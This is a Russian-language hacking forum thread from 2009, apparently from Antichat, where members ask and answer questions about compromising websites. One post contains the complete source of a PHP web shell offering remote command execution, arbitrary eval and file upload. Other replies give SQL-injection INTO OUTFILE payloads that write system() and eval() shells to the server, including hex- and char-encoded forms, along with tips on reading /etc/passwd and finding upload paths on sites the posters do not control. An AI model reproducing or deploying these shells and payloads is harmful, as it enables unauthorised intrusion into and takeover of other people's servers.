Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. apekoff

    apekoff New Member

    Joined:
    12 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Software: . PHP/5.2.10

    uname -a: Windows NT 238878-WEB1 5.2 build 3790

    IUSR_238878-WEB1

    Safe-mode: OFF (not secure)

    C:\ drwxrwxrwx
    Free 125.12 GB of 136.69 GB (91.54%)
     
  2. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    помоему вгета нет в винде =)))

    юзай фтп.
     
    #10402 p.r0phe.t, 1 Dec 2009
    Last edited: 1 Dec 2009
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Выполни phpinfo()
    В disable_functions Есть что нить?
     
  4. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Как залить шелл в e-commerce?
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Прав нету пользователю создавать пользователей, наверно...
     
  6. apekoff

    apekoff New Member

    Joined:
    12 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    с чего такие выводы ? я же говорю что не выолняется cmd ,тоесть не выполняется даже листинг ..и залил я шел только после того как в скуле залил следующий код аплоадера
    Code:
    \
    /+--------------------------------+\\ \
     |            KA_uShell           | \
     |    <KAdot Universal Shell>     | \
     |         Version 0.1.6          | \
     |            13.03.04            | \
     |  Author: KAdot <[email protected]>  | \
     |--------------------------------| \
    \\+                                +/ \
    \
    --> \
    <html> \
    <head> \
    <title>KA_uShell 0.1.6</title> \
    <style type="text/css"> \
    <!-- \
    body, table{font-family:Verdana; font-size:12px;} \
    table {background-color:#EAEAEA; border-width:0px;} \
    b {font-family:Arial; font-size:15px;} \
    a{text-decoration:none;} \
    --> \
    </style> \
    </head> \
    <body> \
    \
    <?php
    $self = $_SERVER['PHP_SELF'];
    $docr = $_SERVER['DOCUMENT_ROOT'];
    $sern = $_SERVER['SERVER_NAME'];
    $tend = "</tr></form></table><br><br><br><br>";
    
    // Configuration
    $login = "admin";
    $pass = "123";
    
    
    /*/ Authentication \
    if (!isset($_SERVER['PHP_AUTH_USER'])) { \
    header('WWW-Authenticate: Basic realm="KA_uShell"'); \
    header('HTTP/1.0 401 Unauthorized'); \
    exit;} \
    \
    else { \
    if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login) \
    { echo "Что надо?"; exit;} \
    } \
    */
    
    
    
    if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
    elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
    else {$ac = "shell";}
    
    // Menu
    echo " \
    |<a href=$self?ac=shell>Shell</a>| \
    |<a href=$self?ac=upload>File Upload</a>| \
    |<a href=$self?ac=tools>Tools</a>| \
    |<a href=$self?ac=eval>PHP Eval Code</a>| \
    |<a href=$self?ac=whois>Whois</a>| \
    <br><br><br><pre>";
    
    
    switch($ac) {
    
    // Shell
    case "shell":
    
    echo <<<HTML \
    <b>Shell</b> \
    <table> \
    <form action="$self" method="POST"> \
    <input type="hidden" name="ac" value="shell"> \
    <tr><td> \
    $$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter"> \
    </td></tr> \
    <tr><td> \
    <textarea cols="100" rows="25"> \
    HTML;
    
    if (!empty($_POST['c'])){
    passthru($_POST['c']);
    }
    echo "</textarea></td>$tend";
    break;
    
    
    //PHP Eval Code execution
    case "eval":
    
    echo <<<HTML \
    <b>PHP Eval Code</b> \
    <table> \
    <form method="POST" action="$self"> \
    <input type="hidden" name="ac" value="eval"> \
    <tr> \
    <td><textarea name="ephp" rows="10" cols="60"></textarea></td> \
    </tr> \
    <tr> \
    <td><input type="submit" value="Enter"></td> \
    $tend \
    HTML;
    
    if (isset($_POST['ephp'])){
    eval($_POST['ephp']);
    }
    break;
    
    
    //Text tools
    case "tools":
    
    echo <<<HTML \
    <b>Tools</b> \
    <table> \
    <form method="POST" action="$self"> \
    <input type="hidden" name="ac" value="tools"> \
    <tr> \
    <td> \
    <input type="radio" name="tac" value="1">B64 Decode<br> \
    <input type="radio" name="tac" value="2">B64 Encode<br><hr> \
    <input type="radio" name="tac" value="3">md5 Hash \
    </td> \
    <td><textarea name="tot" rows="5" cols="42"></textarea></td> \
    </tr> \
    <tr> \
    <td> </td> \
    <td><input type="submit" value="Enter"></td> \
    $tend \
    HTML;
    
    if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
    
    switch($_POST['tac']) {
    
    case "1":
    echo "Раскодированный текст:<b>" .base64_decode($_POST['tot']). "</b>";
    break;
    
    case "2":
    echo "Кодированный текст:<b>" .base64_encode($_POST['tot']). "</b>";
    break;
    
    case "3":
    echo "Кодированный текст:<b>" .md5($_POST['tot']). "</b>";
    break;
    }}
    break;
    
    
    // Uploading
    case "upload":
    
    echo <<<HTML \
    <b>File Upload</b> \
    <table> \
    <form enctype="multipart/form-data" action="$self" method="POST"> \
    <input type="hidden" name="ac" value="upload"> \
    <tr> \
    <td>Файло:</td> \
    <td><input size="48" name="file" type="file"></td> \
    </tr> \
    <tr> \
    <td>Папка:</td> \
    <td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Послать"></td> \
    $tend \
    HTML;
    
    if (isset($_POST['path'])){
    
    $uploadfile = $_POST['path'].$_FILES['file']['name'];
    if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
    
    if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
        echo "Файло успешно загружен в папку $uploadfile\\n";
        echo "Имя:" .$_FILES['file']['name']. "\\n";
        echo "Размер:" .$_FILES['file']['size']. "\\n";
    
    } else {
        print "Не удаётся загрузить файло. Инфа:\\n";
        print_r($_FILES);
    }
    }
    break;
    
    
    // Whois
    case "whois":
    echo <<<HTML \
    <b>Whois</b> \
    <table> \
    <form action="$self" method="POST"> \
    <input type="hidden" name="ac" value="whois"> \
    <tr> \
    <td>Домен:</td> \
    <td><input size="40" type="text" name="wq"></td> \
    </tr> \
    <tr> \
    <td>Хуйз сервер:</td> \
    <td><input size="40" type="text" name="wser" value="whois.ripe.net"></td> \
    </tr> \
    <tr><td> \
    <input align="right" type="submit" value="Enter"> \
    </td></tr> \
    $tend \
    HTML;
    
    if (isset($_POST['wq']) && $_POST['wq']<>"") {
    
    if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
    
    $querty = $_POST['wq']."\\r\\n";
    $fp = fsockopen($wser, 43);
    
    if (!$fp) {echo "Не могу открыть сокет";} else {
    fputs($fp, $querty);
    while(!feof($fp)){echo fgets($fp, 4000);}
    fclose($fp);
    }}
    break;
    
    
    }
    ?> \
    </pre> \
    </body> \
    </html>
    - а уже тем аплоадером залил шелл , кстати во всех шеллах известных - r57 madshel c99 c100 не работает аплоад
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Есть такой шелл... http://mailbrush.eu/shell.php Вопрос в том, где есть системные файлы??? В корене сайта даже намеков нету... Или это не корень? Поиск файла passwd показывает лишь ерунду какую-то... То есть не сис. файлы...
    Code:
     /www/phpBB2/includes/usercp_sendpasswd.php
     /www/phpBB2/language/lang_en...ail/user_activate_passwd.tpl
     /www/phpBB2/language/lang_po...ail/user_activate_passwd.tpl
     /www/phpBB3/language/en/email/user_activate_passwd.txt
     /www/phpBB3/language/pl/email/user_activate_passwd.txt
    апд:
    хм, они скрытые оказывается, т.к.
    Code:
    cat /etc/passwd
    все норм показывает, и самое главное - если в шелле выбрать директорию /etc, то откроется нормально, но в списке директории "/" папки etc нету) кому интерестно - за шеллом в асю
     
    #10407 mailbrush, 1 Dec 2009
    Last edited: 1 Dec 2009
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Много инфы искал, так ничего не нашёл... Проблема заключается вот в чём: есть запрос в который записывается параметр id, например http://test.ru/a.php?id=1, я знаю, что это строка, когда я подставляю id=1', то получаю:
    SELECT a,b,c FROM testtable WHERE id='1\''. И вот чего я не понимаю: как обойти добавление слэша???????????????????????????
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Никак.
     
  10. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    спс
     
  11. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    почему запрос
    SELECT '<?php system($_GET["cmd"]);?>' FROM `news` into outfile '/www/shell.php'
    файл создаёт,но он пустой.
    P.S. разобрался,таблицу не надо указывать.

    Извините за глупость,но скажите,во что можно перекодировать php-код, чтобы в таком кодированном виде его интерпретатор всё-равно схавал?
     
    #10411 p.r0phe.t, 2 Dec 2009
    Last edited: 2 Dec 2009
  12. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    в hex
    SELECT 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B3F3E FROM `news` into outfile '/www/shell.php'
    или char
    SELECT char(60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,71,69,84,91,34,99,109,100,34,93,41,59,63,62) FROM `news` into outfile '/www/shell.php'
     
  13. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    закодировал в хекс,при обращении тупо текст выдает.
     
  14. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    пытаюсь залить шелл на сайт, как мне узнать путь куда можно залить свой файл. На сайте можно читать файлы.
     
  15. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Найти бажный скрипт,который в тексте ошибки выдаст полный путь до директории сайта. Либо перебором через лоадфайл,что достаточно геморно.
     
  16. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Скажите,можно ли залить полноценный шелл,например r57 через инто аутфайл,предварительно закодировав скрипт в hex? пробовал; при обращении к скрипту мыдаются ошибки,хотя простейший шелл для ввода команд спокойно работает в тех же условиях. в чём загвоздка?
     
  17. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    p.r0phe.t, не извращайся, залей <? eval($_REQUEST['cmd']); ?> а потмо уже лей как тебе нравится! =)
    З.Ы. Дай угадаю, ты еще гетом передавал весь захексенный скрипт шелла? =)
     
  18. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    часто выручает гугл

    site:site.com "warn" итд , вобщем ищем ошибки :)
     
  19. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    а вообще есть какието ограничения на количевство символов в строке....
    ну в смысле когда через скулю into outfile'ом заливаеш скрипт шелла?

    и еще такая конструкция <?php system($_GET['cmd']); ?> шелла сработает одинаково и на линукс сервере и на виндовс?
    и wget работает и линукс и на виндовс сервере?
    насколько знаю вгет это линукс качалка)
     
  20. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    сильно не пинайте, но смотрел в ютубе видео и стало очень интересно - как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?
    видео по адресу: __http://www.youtube.com/watch?v=MJNJjh4jORY
     
Thread Status:
Not open for further replies.